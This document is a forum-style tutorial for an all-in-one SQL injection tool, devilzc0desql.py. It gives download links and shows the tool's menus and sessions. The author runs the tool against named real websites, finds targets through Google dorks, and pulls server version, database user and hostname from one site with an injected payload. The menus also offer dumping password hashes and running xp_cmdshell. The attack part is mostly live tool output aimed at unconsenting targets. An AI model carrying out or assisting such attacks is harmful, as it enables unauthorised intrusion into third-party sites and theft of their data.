Ksecurity-team

ool name: devilzc0desql.py version 1.0
Download url:
http://flightinformationdisplay.com/mywisdom/devilzc0desql.tgz
or
http://yoyoparty.com/upload/devilzc0desql.tgz
Programmer: mywisdom (antonsoft_2004@yahoo.com)
Requirement(s): python, php (with curl library installed) and perl

Ok I suppose you have installed them on your machine. To run this, open your terminal or ms dos prompt then cd to devilzc0desql directory. (on unix or linux u may extract using : tar zxvf devilzc0desql.tgz).
Then just type :

python devilzc0desql.py

And the result is:

root@DL:/opt/lampp/htdocs/webhackframework/devilzc0desql# ./devilzc0desql.py

****************************************************************************

                 Devilzc0deSQL.py version 1.0                                                      

                 Programmer: mywisdom (antonsoft_2004@yahoo.com)                                    

                 Dedicated to: Devilzc0de                                                 

                 This is All in one sql injection tool for both mysql and msssql and ms access     

****************************************************************************

        Please choose your option below:

 [1] Attack Mysql target (this will lauch hzosql)

 [2] Attack Mssql target (this will launch silviasql)

 Type 1 or 2 for your choice below !

Please type your choice:

Ok then…if you need to run mysql injection tool, just type: 1
otherwise, if you wanna run mssql injection tool, just type: 2
Option number 1 (running mysql injection tool mode (hzosql))

***********************************************************************************************************************************************
         HZO mysql injection tool version 2.0
dedicated for hackerzonline.info,devilzc0de.org,gorontalodefacer.org,h4cky0u.org,jasakom.com,yogyacarderlink.web.id and darkc0de.com
          by: mywisdom (antonsoft_2004@yahoo.com)
*************************************************************************************************************************************************

Results saved at hzosql.log

additional support(s): load file checking, blind sqli checking, log w00t message at hzosql.log
Steps:
1. Check url for vulnerable sql injection or blind sql injection
2. Check multiple url lists from a text file for vulnerable sql injection and blind sql injection
3. Find column length of multiple url lists from a text file (non blind sqli)
4. Find column length of sqli and blind sql injection of a target
5. Get mysql server configuration from a sqli url (must include code),load file, select mysql.user (mysql 4 and 5)
6. Show all databases user has access to (must include code) ( mysql 5+)
7. Enumerates information_schema databases(must include code) (mysql 5+)
8. Dump information from database, table or column (must include code) (mysql 4 and 5)
9. Fuzz tables and columns (must include code) (mysql 4)
10.Automatic Step by Steps Sql Injections or Blind Sql Injections (run step 4 until step 7 automaticly)
11.Full Web SQLi testing (search sqli from every proper url at front page)
12.Exit this module
Just type 1 or 2 or 3 or 4 or 5 or 6 or 7 or 8 or 9 or 10 or 11 or 12 (based on steps you have done)

Type your step number:

Ok this is our mysql injection tool called hzo sql version 2.0, it’s different from version 1.0 , in this version now it supports more accurate blind sql injection, load file checking and also log results.
Ok to do a quick sql injection the best way is using option number 10, so what you need is just type: 10 , then it will aks you for your target url, something like this:

***********************************************************************************************************************************************
         HZO mysql injection tool version 2.0
dedicated for hackerzonline.info,devilzc0de.org,gorontalodefacer.org,h4cky0u.org,jasakom.com,yogyacarderlink.web.id and darkc0de.com
          by: mywisdom (antonsoft_2004@yahoo.com)
*************************************************************************************************************************************************

Results saved at hzosql.log

additional support(s): load file checking, blind sqli checking, log w00t message at hzosql.log
Steps:
1. Check url for vulnerable sql injection or blind sql injection
2. Check multiple url lists from a text file for vulnerable sql injection and blind sql injection
3. Find column length of multiple url lists from a text file (non blind sqli)
4. Find column length of sqli and blind sql injection of a target
5. Get mysql server configuration from a sqli url (must include code),load file, select mysql.user (mysql 4 and 5)
6. Show all databases user has access to (must include code) ( mysql 5+)
7. Enumerates information_schema databases(must include code) (mysql 5+)
8. Dump information from database, table or column (must include code) (mysql 4 and 5)
9. Fuzz tables and columns (must include code) (mysql 4)
10.Automatic Step by Steps Sql Injections or Blind Sql Injections (run step 4 until step 7 automaticly)
11.Full Web SQLi testing (search sqli from every proper url at front page)
12.Exit this module
Just type 1 or 2 or 3 or 4 or 5 or 6 or 7 or 8 or 9 or 10 or 11 or 12 (based on steps you have done)

Type your step number:
10

*******************loading...***********************************
(this tool can work with blind sql injection now!!!)

Type your target url:

http://www.vaalweekly.com/index.php?option=com_ignitegallery&task=view&gallery=5

(if you don't type max column length to search, max column search will be 100)
Type max column length number to search:
15

Ok in this sample I just copy and paste my target url:

http://www.vaalweekly.com/index.php?option=com_ignitegallery&task=view&gallery=5

Then it will ask you for max column length number, in this case I type 15 for max column length for test, it’s up to you, you may input 20 or 20 or 100, and so on…
Ok then you will see below that our target is vulnerable to blind sql injection:


The MSSQL Injection Tool
Ok suppose you run devilzc0desql.py and choose option number 2, Ok here is our mssql injection tool start:



Ok next I’m testing to search for vulnerable target(s) from google uk here the sample:



Ok here’s more complete step by step example:

**********************Silvia SQL version 2.0***************************

             Programmer:mywisdom (antonsoft_2004.com)   

                        SQLI Tool for MSSQL & MS Jet    

                   Especially dedicated for Silvia     

**********************Silvia SQL version 1.0***************************
Option numbers / Steps:
0. Search for sqli vulnerable site(s) from google based on a region(MSSQL and MS Jet only)
1. Check url for vulnerable sql injection (MSSQL and MS Jet)
2. Getting MSSQL Configuration (MSSQL only)
3. Search for Table Name(s) in current Database (MSSQL only)
4. Search for Column Name(s) in a table (MSSQL only)
5. Dump a column (MSSQL only)
6. Automatic Step by Step (Run Step 1 until step 4 automaticly (MSSQL only))
7. List a User and password hash (MSSQL only)
8. Try EXEC xp_cmdshell(MSSQL 2000 only)
9. Searh Column length then try Fuzzing Table(s) and column(s)(MS Jet only)
Type help for Help, type exit to stop this tool
(just type: 1 or 2 or 3 or 4 or 5 or 6 or 7 or 8 or 9)
Type your option number:0

This tool will use google.com as default, you may choose other google based on country
Do you want to google search based on country ? (y/n)y

Available google url based on country, please choose:
1. www.google.com
2. www.google.co.uk (google uk)
3. www.google.co.id (google indonesia)
4. www.google.co.il (google israel)
5. www.google.co.in (google india)
6. www.google.co.jp (google japan)
7. www.google.cn (google china)
8. www.google.com.sg (google singapore)
9. www.google.com.my (google malaysia)
10. www.google.com.tr (google turkey)
11. www.google.com.pk (google pakistan)
12. www.google.co.il (google israel)
13. www.google.es (google spain)
14. www.google.com.au (google australia)
(just type the number :1 or 2 or 3 till 14)
Type option number:2

Insert Google Dork:inurl:"page.asp?id="
Total Query Pages (10 Links/Pages) :10

[+] Please wait ! Searching vulnerable mssql and ms jet injection target(s) from google  ...

-----------------------------------------------

--------Going to Next Page ----------------

Your google url:http://www.google.co.uk/search?hl=en&q=inurl:"page.asp?id="&btnG=Search&start=0&meta=cr=countryUK|countryGB

--------Searching from next page,please wait----------------

[+]http://www.northernirelandscreen.co.uk/page.asp?id=211' => Could be Vulnerable in MS Access Injection!!

--------Going to Next Page ----------------

Your google url:http://www.google.co.uk/search?hl=en&q=inurl:"page.asp?id="&btnG=Search&start=10&meta=cr=countryUK|countryGB

--------Searching from next page,please wait----------------

[+]http://www.northernirelandscreen.co.uk/page.asp?id=239' => Could be Vulnerable in MS Access Injection!!

--------Going to Next Page ----------------

Your google url:http://www.google.co.uk/search?hl=en&q=inurl:"page.asp?id="&btnG=Search&start=20&meta=cr=countryUK|countryGB

--------Searching from next page,please wait----------------

[+]http://www.englishwomensgolf.org/page.asp?id=327' => Could be Vulnerable in MSSQL Injection!!

Ok, here’s explanation for above step(s):

From above sample, I choose option number 0 , this will use google to search vulnerable target(s). then I type y , to choose search target based on country.
And next I choose option number 2 for google uk, then I input this dork inurl:”page.asp?id=” and finally ..I type: 10 to search every 10 pages.

Ok next we’re testing for a target here’s the sample of this silviasql:

             Especially dedicated for Silvia     

**********************Silvia SQL version 1.0***************************
Option numbers / Steps:
0. Search for sqli vulnerable site(s) from google based on a region(MSSQL and MS Jet only)
1. Check url for vulnerable sql injection (MSSQL and MS Jet)
2. Getting MSSQL Configuration (MSSQL only)
3. Search for Table Name(s) in current Database (MSSQL only)
4. Search for Column Name(s) in a table (MSSQL only)
5. Dump a column (MSSQL only)
6. Automatic Step by Step (Run Step 1 until step 4 automaticly (MSSQL only))
7. List a User and password hash (MSSQL only)
8. Try EXEC xp_cmdshell(MSSQL 2000 only)
9. Searh Column length then try Fuzzing Table(s) and column(s)(MS Jet only)
Type help for Help, type exit to stop this tool
(just type: 1 or 2 or 3 or 4 or 5 or 6 or 7 or 8 or 9)
Type your option number:2
Do you want to use proxy url ? (y/n)n

must include http://
Type target url:http://www.waterbucket.ca/rm/index.asp?type=single&sid=44&id=307

**********working please wait**************

[-] Gathering MSSQL configuration...please wait...
[-]SQLI url:http://www.waterbucket.ca/rm/index.asp?type=single&sid=44&id=307+and+1=convert(int,@@version)#

[+]Version Info:Microsoft SQL Server 2005 - 9.00.3042.00 (Intel X86)
 Feb  9 2007 22:47:07
 Copyright (c) 1988-2005 Microsoft Corporation
 Express Edition with Advanced Services on Windows NT 5.2 (Build 3790: Service Pack 2)

[+]Current User:wbcRM-dbuser-readonly

[+]Current Database:wbcRM

[+]Hostname:WATERBALANCE

_________________________________________________________________
Completed running your operation, result saved at silvialog.txt
(If no result(s) showed here means there's no data or data can not be dump or your proxy doesnt work, you should check manually or use other working proxy)
mywisdom@DL:/opt/lampp/htdocs/webhackframework/devilzc0desql$ 

Ok here’s a little explanation of above sample
first I choose mssql injection tool after running devilzc0desql.py , then I type number:2 for getting mssql information, then I type : n ..so this means no proxy. then I type my target url:

http://www.waterbucket.ca/rm/index.asp?type=single&sid=44&id=307

and enter and so on…

Ok see you again …
greets: all devilzc0de, ycl,tecon,jasakom,jatimcrew, darkc0de crews and members
Tool name: devilzc0desql.py version 1.0
Download url: http://yoyoparty.com/upload/devilzc0desql.tgz
Programmer: mywisdom (antonsoft_2004@yahoo.com)
Requirement(s): python, php (with curl library installed) and perl